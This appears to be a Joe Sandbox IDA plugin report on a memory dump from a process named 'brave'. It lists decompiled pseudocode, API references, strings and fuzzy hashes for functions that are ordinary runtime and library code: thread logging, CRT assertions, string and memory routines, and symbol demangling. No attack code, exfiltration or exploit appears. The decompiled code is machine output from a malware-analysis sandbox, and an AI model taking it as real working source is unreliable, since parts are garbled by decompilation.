Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 46604ae227c626b1be511848d822de1d4529c5c54d514a26e591d6aa839660e6
Instruction ID: 96d2f9d738bda521f9cbb35d5fb669e81ef870419ad353c86c5b0407b9a094b8
Opcode Fuzzy Hash: 46604ae227c626b1be511848d822de1d4529c5c54d514a26e591d6aa839660e6
Instruction Fuzzy Hash: 0921A2A1E08D0249FA7C7678849137990419F4AB74FD84A36C52E867F5DF1DA8CD8331

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA3D00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
threadCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00007FF77FF715BA3D00(void* __edi, long long __rcx, void* __rdx, void* _a8, long long _a32, long long _a40, intOrPtr _a96) {
				intOrPtr _t9;
				long _t13;
				void* _t14;
				intOrPtr _t17;
				intOrPtr* _t22;
				long long _t24;

				_t9 =  *0x15e513e0; // 0x0
				_a8 = __rcx;
				if (_t9 == 0) goto 0x15ba3d9c;
				_t22 = _a8;
				if (_t22 != 0) goto 0x15ba3d50;
				r8d = GetCurrentThreadId();
				_pop(_t24);
				goto 0x15bb1680;
				asm("o16 nop [eax+eax]");
				E00007FF77FF715BA3190(__edi, _a96);
				E00007FF77FF715BA3190(__edi, _a96);
				_t17 =  *_t22;
				_t13 = GetCurrentThreadId();
				_t14 = E00007FF77FF715BA3190(_t17, _a96);
				_a40 = _t24;
				r9d = _t17;
				r8d = _t13;
				_a32 =  *((intOrPtr*)(_t22 + 0x28));
				0x15bb1680();
				return _t14;
			}

0x7ff715ba3d08
0x7ff715ba3d0e
0x7ff715ba3d18
0x7ff715ba3d1e
0x7ff715ba3d26
0x7ff715ba3d3a
0x7ff715ba3d41
0x7ff715ba3d45
0x7ff715ba3d4a
0x7ff715ba3d55
0x7ff715ba3d63
0x7ff715ba3d68
0x7ff715ba3d6a
0x7ff715ba3d77
0x7ff715ba3d7c
0x7ff715ba3d81
0x7ff715ba3d84
0x7ff715ba3d87
0x7ff715ba3d96
0x7ff715ba3da4

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF715BA3D28
GetCurrentThreadId.KERNEL32 ref: 00007FF715BA3D6A

Strings

T%p %d V=%0X H=%p %s, xrefs: 00007FF715BA3D8F
T%p %d %s, xrefs: 00007FF715BA3D33

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CurrentThread
String ID: T%p %d %s$T%p %d V=%0X H=%p %s
API String ID: 2882836952-2059990036
Opcode ID: fb28173ffc3efe5c2c797d80106deafb06b5f9291af923cbf097269bcea0b66e
Instruction ID: 5114d44febdf3c8d91cba52de8d4fb1534ff763b48b1c4b58ca5488d89124fe1
Opcode Fuzzy Hash: fb28173ffc3efe5c2c797d80106deafb06b5f9291af923cbf097269bcea0b66e
Instruction Fuzzy Hash: 00015E36F09E0181E635AB56E91446AE3A5BB84FE0F884132EE4D87771EF7CE449C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9F210 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF715B9F24C
calloc.MSVCRT ref: 00007FF715B9F25B

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF715B9F23E
!dso || dso == &__dso_handle, xrefs: 00007FF715B9F245

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: _assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 615528074-4180103562
Opcode ID: 3ff3c1c08b56fb9e230e04f1b49c40747e94c7a2db62898a806f7c776ec9269e
Instruction ID: 8f8598fda6a6bd7f3d79584c7179e588922a4b8a0c4c69e1978123ea0e2296de
Opcode Fuzzy Hash: 3ff3c1c08b56fb9e230e04f1b49c40747e94c7a2db62898a806f7c776ec9269e
Instruction Fuzzy Hash: 270152B5E18F0645F73AAB65E9502A6A295AF44FF0FC44130D91C477A1EF2CD989C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E1F0 Relevance: 6.3, APIs: 5, Instructions: 94
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00007FF77FF715B9E1F0(void* __rax, void* __rcx, void* __rdx, intOrPtr* __r8, intOrPtr* __r9) {
				intOrPtr _v48;
				long long _v56;
				long long _v64;
				char _v72;
				void* _t10;
				void* _t14;
				void* _t15;
				intOrPtr* _t28;
				intOrPtr* _t36;

				_t36 = __r8;
				_t28 = __r9;
				if (__rcx == 0) goto 0x15b9e2e0;
				if (__rdx == 0) goto 0x15b9e21b;
				if (__r8 == 0) goto 0x15b9e2e0;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0;
				_v48 = 0;
				if (E00007FF77FF715B9D760(_t10, _t15, __rax, __rcx, 0x7ff715b951f0,  &_v72) == 0) goto 0x15b9e320;
				if (_v48 == 0) goto 0x15b9e2c0;
				if (_v72 == 0) goto 0x15b9e33d;
				if (__rdx == 0) goto 0x15b9e310;
				strlen(??);
				if (__rax -  *_t36 >= 0) goto 0x15b9e300;
				_t14 = memcpy(??, ??, ??);
				free(??);
				if (_t28 == 0) goto 0x15b9e2ad;
				 *_t28 = 0;
				return _t14;
			}

0x7ff715b9e1fe
0x7ff715b9e201
0x7ff715b9e207
0x7ff715b9e210
0x7ff715b9e215
0x7ff715b9e227
0x7ff715b9e230
0x7ff715b9e239
0x7ff715b9e242
0x7ff715b9e251
0x7ff715b9e262
0x7ff715b9e26c
0x7ff715b9e275
0x7ff715b9e27e
0x7ff715b9e286
0x7ff715b9e292
0x7ff715b9e29d
0x7ff715b9e2a5
0x7ff715b9e2a7
0x7ff715b9e2bb

APIs

strlen.MSVCRT ref: 00007FF715B9E27E
memcpy.MSVCRT ref: 00007FF715B9E292
free.MSVCRT ref: 00007FF715B9E29D

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 498b3f5b9e13853de3fd77891ce67d711f26d8732301d510346af88e7737a2e8
Instruction ID: e3ac66f6b9fb5b556d6f2cb98a3396627b16a18f7b2234d8f07734c25de1f5b8
Opcode Fuzzy Hash: 498b3f5b9e13853de3fd77891ce67d711f26d8732301d510346af88e7737a2e8
Instruction Fuzzy Hash: F43174A2A0DE5289FA7A6A11D50037AE690BF44BBCFD84531ED4E062E4DF3CA54C8624

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BAD380 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF715BAD471

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction ID: b0c68197f89281bd90ced14f53d1c1851d4783960aabf234a4c9a6529fb801c8
Opcode Fuzzy Hash: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction Fuzzy Hash: FEC10A62E18A414BF73A6B28C00033AA6A1BF44F78F954235DE1D1B7E5CB3CF9498760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BAA7D0 Relevance: 6.3, APIs: 4, Instructions: 319COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF715BAA8C1

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction ID: 73a02c51c5aa33aae702b8cc46257b7015f696570735f31c94eadc11feb33600
Opcode Fuzzy Hash: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction Fuzzy Hash: 47C1E662E08A4246F77A6A24C10037EAAD1BF04F78F994235CA1D177E5CBBCED498770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9D760 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 315
stringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF77FF715B9D760(signed int __eax, signed int __edx, void* __rax, signed char* __rcx, long long __rdx, long long __r8) {
				signed int _t83;
				void* _t86;
				int _t89;
				signed int _t91;
				void* _t94;
				signed int _t108;
				void* _t111;
				void* _t113;
				long long _t137;
				signed long long _t140;
				unsigned long long _t160;
				long long* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				signed long long _t182;
				void* _t184;
				signed char* _t188;
				void* _t189;
				signed char* _t190;

				_t167 = _t166 - 0x218;
				_t165 = _t167 + 0x80;
				r15d =  *__rcx & 0x000000ff;
				_t111 = r15b - 0x5f;
				if (_t111 == 0) goto 0x15b9dad0;
				asm("repe cmpsb");
				asm("sbb al, 0x0");
				r14d = 0;
				if ((__eax & 0xffffff00 | _t111 > 0x00000000) != 0) goto 0x15b9d7e0;
				_t113 = (__rcx[8] & 0x000000ff) - 0x24 - 0x3b;
				if (_t113 > 0) goto 0x15b9d7e0;
				asm("dec eax");
				if (_t113 >= 0) goto 0x15b9d7e0;
				_t83 = __rcx[9] & 0x000000ff;
				if (_t83 == 0x44) goto 0x15b9db10;
				if (_t83 == 0x49) goto 0x15b9db10;
				strlen(??);
				 *((long long*)(_t165 - 0x50)) = __rcx;
				 *((intOrPtr*)(_t165 - 0x40)) = 0x11;
				r8d = __rax + __rax;
				 *((long long*)(_t165 - 0x48)) = __rax + __rcx;
				 *(_t165 - 0x38) = __rcx;
				 *(_t165 - 0x24) = r8d;
				 *((intOrPtr*)(_t165 - 0x28)) = 0;
				 *((intOrPtr*)(_t165 - 0x14)) = __edx;
				 *((intOrPtr*)(_t165 - 0x18)) = 0;
				 *((long long*)(_t165 - 0x10)) = 0;
				 *((long long*)(_t165 - 8)) = 0;
				 *_t165 = 0;
				if (r8d - 0x800 > 0) goto 0x15b9dab3;
				_t86 = E00007FF77FF715B9F680(0);
				_t168 = _t167 - (r8d << 5);
				_t160 = _t168 + 0x27;
				E00007FF77FF715B9F680(_t86);
				_t169 = _t168 - (0x0000000f + __edx * 0x00000008 & 0xfffffff0);
				 *(_t165 - 0x30) = _t160 & 0xfffffff8;
				_t137 = _t169 + 0x20;
				 *((long long*)(_t165 - 0x20)) = _t137;
				if (r14d == 1) goto 0x15b9dae8;
				_t23 = _t189 - 2; // -2
				if (_t23 - 1 > 0) goto 0x15b9daf8;
				_t190 =  &(__rcx[0xb]);
				 *(_t165 - 0x38) = _t190;
				if (__rcx[0xb] != 0x5f) goto 0x15b9d8b8;
				if (__rcx[0xc] == 0x5a) goto 0x15b9dc32;
				 *(_t165 - 0x60) = _t160 >> 3;
				 *(_t165 - 0x54) = r8d;
				_t89 = strlen(??);
				r8d =  *(_t165 - 0x54);
				_t182 =  *(_t165 - 0x60);
				if (r8d <= 0) goto 0x15b9dbf3;
				 *((long long*)(4 + _t182 * 8)) = 0;
				 *((intOrPtr*)(_t165 - 0x28)) = 1;
				if (_t89 <= 0) goto 0x15b9dbf3;
				 *(_t182 * 8) = 0;
				 *(0x10 + _t182 * 8) = _t190;
				 *(0x18 + _t182 * 8) = _t89;
				r9d = 0;
				E00007FF77FF715B94DD0();
				strlen(??);
				_t188 =  &(( *(_t165 - 0x38))[_t137]);
				 *(_t165 - 0x38) = _t188;
				_t91 =  *_t188 & 0x000000ff;
				if (_t91 != 0) goto 0x15b9daee;
				if (_t137 == 0) goto 0x15b9daee;
				 *((long long*)(_t165 + 0x120)) = __rdx;
				_t184 = _t165 + 0x10;
				 *((char*)(_t165 + 0x118)) = 0;
				 *((long long*)(_t165 + 0x110)) = 0;
				 *((long long*)(_t165 + 0x128)) = __r8;
				 *((long long*)(_t165 + 0x130)) = 0;
				 *((long long*)(_t165 + 0x138)) = 0;
				 *((long long*)(_t165 + 0x140)) = 0;
				 *((long long*)(_t165 + 0x148)) = 0;
				 *((intOrPtr*)(_t165 + 0x150)) = 0;
				 *((long long*)(_t165 + 0x158)) = 0;
				 *((long long*)(_t165 + 0x160)) = 0;
				 *((long long*)(_t165 + 0x168)) = 0;
				 *((long long*)(_t165 + 0x170)) = 0;
				 *((long long*)(_t165 + 0x178)) = 0;
				E00007FF77FF715B950B0();
				if ( *((intOrPtr*)(_t165 + 0x144)) - 0x7ff > 0) goto 0x15b9da0c;
				 *((intOrPtr*)(_t165 + 0x144)) = 0;
				 *((long long*)(_t165 + 0x180)) = 0;
				_t108 =  *(_t165 + 0x17c) * _t91;
				_t139 =  <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c));
				_t140 = ( <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c))) << 4;
				 *(_t165 + 0x17c) = _t108;
				E00007FF77FF715B9F680(_t91);
				_t170 = _t169 - _t140;
				_t94 =  >  ? _t108 : 1;
				E00007FF77FF715B9F680(_t140);
				 *((long long*)(_t165 + 0x160)) = _t170 + 0x20;
				 *((long long*)(_t165 + 0x170)) = _t170 - (_t140 << 4) + 0x20;
				E00007FF77FF715B9BFE0(_t184, _t137);
				 *((char*)(_t165 +  *((intOrPtr*)(_t165 + 0x110)) + 0x10)) = 0;
				 *((intOrPtr*)(_t165 + 0x120))();
				return 0 |  *((intOrPtr*)(_t165 + 0x140)) == 0x00000000;
			}

0x7ff715b9d76c
0x7ff715b9d773
0x7ff715b9d77b
0x7ff715b9d788
0x7ff715b9d78c
0x7ff715b9d7a1
0x7ff715b9d7a6
0x7ff715b9d7a8
0x7ff715b9d7ad
0x7ff715b9d7b7
0x7ff715b9d7b9
0x7ff715b9d7c5
0x7ff715b9d7c9
0x7ff715b9d7cb
0x7ff715b9d7d2
0x7ff715b9d7da
0x7ff715b9d7e3
0x7ff715b9d7e8
0x7ff715b9d7f2
0x7ff715b9d7f9
0x7ff715b9d7fd
0x7ff715b9d803
0x7ff715b9d807
0x7ff715b9d80b
0x7ff715b9d812
0x7ff715b9d815
0x7ff715b9d81c
0x7ff715b9d824
0x7ff715b9d82c
0x7ff715b9d83b
0x7ff715b9d84b
0x7ff715b9d850
0x7ff715b9d856
0x7ff715b9d872
0x7ff715b9d877
0x7ff715b9d87a
0x7ff715b9d87e
0x7ff715b9d883
0x7ff715b9d88b
0x7ff715b9d891
0x7ff715b9d898
0x7ff715b9d89e
0x7ff715b9d8a7
0x7ff715b9d8ab
0x7ff715b9d8b2
0x7ff715b9d8bb
0x7ff715b9d8bf
0x7ff715b9d8c3
0x7ff715b9d8c8
0x7ff715b9d8cc
0x7ff715b9d8d3
0x7ff715b9d8d9
0x7ff715b9d8e5
0x7ff715b9d8ee
0x7ff715b9d8f4
0x7ff715b9d904
0x7ff715b9d90c
0x7ff715b9d923
0x7ff715b9d929
0x7ff715b9d938
0x7ff715b9d93d
0x7ff715b9d940
0x7ff715b9d944
0x7ff715b9d94b
0x7ff715b9d954
0x7ff715b9d95a
0x7ff715b9d961
0x7ff715b9d96b
0x7ff715b9d972
0x7ff715b9d97d
0x7ff715b9d984
0x7ff715b9d98f
0x7ff715b9d99a
0x7ff715b9d9a5
0x7ff715b9d9b0
0x7ff715b9d9ba
0x7ff715b9d9c5
0x7ff715b9d9d0
0x7ff715b9d9db
0x7ff715b9d9e6
0x7ff715b9d9f1
0x7ff715b9da00
0x7ff715b9da02
0x7ff715b9da21
0x7ff715b9da2c
0x7ff715b9da31
0x7ff715b9da35
0x7ff715b9da39
0x7ff715b9da3f
0x7ff715b9da44
0x7ff715b9da4b
0x7ff715b9da59
0x7ff715b9da66
0x7ff715b9da78
0x7ff715b9da7f
0x7ff715b9da98
0x7ff715b9da9d
0x7ff715b9dac6

APIs

strlen.MSVCRT ref: 00007FF715B9D7E3
strlen.MSVCRT ref: 00007FF715B9D8C3
strlen.MSVCRT ref: 00007FF715B9D938

Strings

_GLOBAL_, xrefs: 00007FF715B9D797

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: strlen
String ID: _GLOBAL_
API String ID: 39653677-770460502
Opcode ID: a980d7a97dd603dd885cedb4aa38cc9247ee4e0068a44f4649bb0ec17d10a106
Instruction ID: 850f3254422c4f7936012b854e53633c4c0b14e2b93dd5629c2b1af2d2c64720
Opcode Fuzzy Hash: a980d7a97dd603dd885cedb4aa38cc9247ee4e0068a44f4649bb0ec17d10a106
Instruction Fuzzy Hash: 76D106B2A08AD68DF774AF2294043FE7BA1AB05BA8F844035DA4D177A5CF3C9549C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BAD8C0 Relevance: 6.2, APIs: 4, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction ID: 938e7b3d5104121f666fc63ffa930c0c03e9f8ed810675de17ff5a06f0463187
Opcode Fuzzy Hash: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction Fuzzy Hash: D9918472B08A524BE77A9F25C104379A6A1BB04FA4F988131CF0D577E8DB3CE949C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BAAD10 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction ID: 6c09493c1fdecbf6bba13284f6b6b4b0e99ad3b624d4dd1f89996158c2b401d1
Opcode Fuzzy Hash: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction Fuzzy Hash: 6591B572E09A5286E77F9F298100339AB91BB04FA4F948131CE1D573D5DBBDE8098770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB9C50 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BB9C50(void* __eflags, long long* __rcx, signed char* __rdx, long long __r8) {
				long long _v32;
				signed int _t6;
				long long _t15;

				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				if (__eflags == 0) goto 0x15bb9c75;
				if (__rdx == 0) goto 0x15bb9ce4;
				_v32 = __r8;
				if (__r8 - 0xf > 0) goto 0x15bb9cb0;
				if (__r8 != 1) goto 0x15bb9ca0;
				_t6 =  *__rdx & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = __r8;
				 *((char*)(_t15 + __r8)) = 0;
				return _t6;
			}

0x7ff715bb9c5e
0x7ff715bb9c68
0x7ff715bb9c6e
0x7ff715bb9c73
0x7ff715bb9c75
0x7ff715bb9c7e
0x7ff715bb9c84
0x7ff715bb9c86
0x7ff715bb9c8b
0x7ff715bb9c8e
0x7ff715bb9c92
0x7ff715bb9c9e

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF715BB9CE4, 00007FF715BB9D94, 00007FF715BB9E44

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
